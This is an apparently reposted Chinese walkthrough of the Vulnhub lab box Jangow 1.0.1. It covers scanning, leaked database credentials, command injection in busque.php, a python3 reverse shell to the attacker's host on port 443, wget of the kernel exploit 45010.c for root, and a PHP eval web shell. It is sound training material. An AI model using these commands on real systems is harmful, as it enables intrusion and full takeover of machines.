欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 汽车 > 时评 > Vulnhub靶场 Jangow: 1.0.1 练习

Vulnhub靶场 Jangow: 1.0.1 练习

2025/9/24 19:44:27 来源:https://blog.csdn.net/weixin_39762423/article/details/143968102  浏览:    关键词:Vulnhub靶场 Jangow: 1.0.1 练习

目录

  • 0x00 准备
  • 0x01 主机信息收集
  • 0x02 站点信息收集
  • 0x03 漏洞查找与利用
    • 1. 命令执行
    • 2. 反弹shell
    • 3. 提权
    • 4. 补充
      • 4.1 其他思路
      • 4.2 问题
  • 0x04 总结


0x00 准备


下载链接:https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova

介绍:

Difficulty: easy

The secret to this box is enumeration! Inquiries jangow2021@gmail.com

This works better with VirtualBox rather than VMware ## Changelog 2021-11-04 - v1.0.1 2021-11-01 - v1.0.0



0x01 主机信息收集


kali本机的ip:192.168.119.128

探测目标主机IP:netdiscover -i eth0 -r 192.168.119.0/24
目标主机IP:192.168.119.134

探测目标主机开放端口:nmap -sV -p 1-65535 -A 192.168.119.134
在这里插入图片描述


开放了21端口,vsftp3.0.3版本。80端口,apache2.4.18版本。



0x02 站点信息收集


访问80端口,探测站点的目录结构:dirsearch -u 192.168.119.134
在这里插入图片描述


一个site目录,还有/.backup目录。

进入site目录是一个站点的首页:
在这里插入图片描述


再看一下/.backup页面:
在这里插入图片描述


看到了数据库相关的信息,并且是mysql数据库,这里保存一下获取到的信息:

$servername = "localhost";
$database = "jangow01";
$username = "jangow01";
$password = "abygurl69";


0x03 漏洞查找与利用


1. 命令执行


看站点上的信息,右上角Menu菜单这里有三个菜单,About,Project,Buscar。

点击About时,URL是:http://192.168.119.134/site/#about
点击Project时,URL是:http://192.168.119.134/site/#projects
点击Buscar时,URL是:http://192.168.119.134/site/busque.php?buscar=

有个等号,并且页面是空白页:
在这里插入图片描述


考虑传参。传了个1,还是空白页。换思路,传了个ifconfig,有查出网络配置的信息:
在这里插入图片描述


又换了个whoami:
在这里插入图片描述


2. 反弹shell


这里有命令执行了,尝试一下反弹shell。

先在kali中监听端口9898:nc -lvvp 9898


再在浏览器中访问:http://192.168.119.134/site/busque.php?buscar=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.119.128",9898));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

结果一直无法监听。



改成443端口就可以监听成功。

先在kali中监听端口443:nc -lvvp 443

再在浏览器中访问:http://192.168.119.134/site/busque.php?buscar=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.119.128",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

监听成功:
在这里插入图片描述



3. 提权


查看一下系统的相关信息。

查看内核版本:uname -a

查看发行版本:lsb_release -a
在这里插入图片描述


内核版本是ubuntu 4.4.3-31 ,发行版本是 ubuntu 16.04。

搜索一下相关的漏洞:searchsploit Ubuntu 4.4.0-31
在这里插入图片描述


这里我们要进行提权,所以选择45010.c这个试一下。

这个脚本的完整路径是/usr/share/exploitdb/exploits/linux/local/45010.c

编译这个脚本:gcc /usr/share/exploitdb/exploits/linux/local/45010.c -o abc


接下来就是将abc这个文件传到目标主机上。

在kali机器上用python创建一个简单的http服务器:python2 -m SimpleHTTPServer 443 (由于靶机的限制,这里只能用443端口)

在靶机上,先进入临时目录:cd /tmp

再执行:wget http://192.168.119.128:443/abc
在这里插入图片描述



这时候如果直接运行abc的话,会提示权限不足。所以先给这个文件加一个执行权限:chmod +x abc
在这里插入图片描述



结果提示GLIBC_2.34没有找到,这是因为编译是在kali下面完成的,是这个版本,但是目标主机没有这个版本。所以应该直接把编译前的文件传到目标靶机中,在靶机中编译。

在kali中,把45010.c移动到开http服务的目录下:cp /usr/share/exploitdb/exploits/linux/local/45010.c .

在靶机的tmp目录下执行:wget http://192.168.119.128:443/45010.c

编译这个文件:gcc 45010.c -o exp
在这里插入图片描述



运行exp文件:./exp
在这里插入图片描述


提权成功

4. 补充


4.1 其他思路


做完后,参考了前辈们的文章,在目标主机给buscar参数传值进行命令执行的时候,可以上传一句话:echo '<?php eval($_POST["pass"]);' > shell.php

再用蚁剑连接:http://192.168.119.134/site/shell.php

在这里进行传文件等操作。



另外,还可以在wordpress目录下查看配置文件 config.php的内容,这里面也有一对账号密码。这样就收集到了两对账号密码。在前面端口扫描的时候开放了ftp服务,可以尝试用这两对账号密码进行frp登录尝试:ftp 192.168.119.134

backup文件中的账号密码可以登录成功。



4.2 问题


在反弹shell的时候,只能监听443端口。这里应该是因为目标主机的防火墙或系统策略限制目标主机必须使用特定的出站端口,若目标主机强制出站端口为 443,则攻击者必须监听在 443。



0x04 总结


主机信息收集:

  1. netdiscover探测目标主机ip。
  2. nmap探测开放的端口和服务。

站点信息收集:

  1. 扫描站点目录。
  2. 发现账号密码敏感信息。
  3. 发现命令执行的点。

漏洞利用:

  1. 在命令执行处进行反弹shell。
  2. 获取系统的版本信息,进行内核提权。



版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词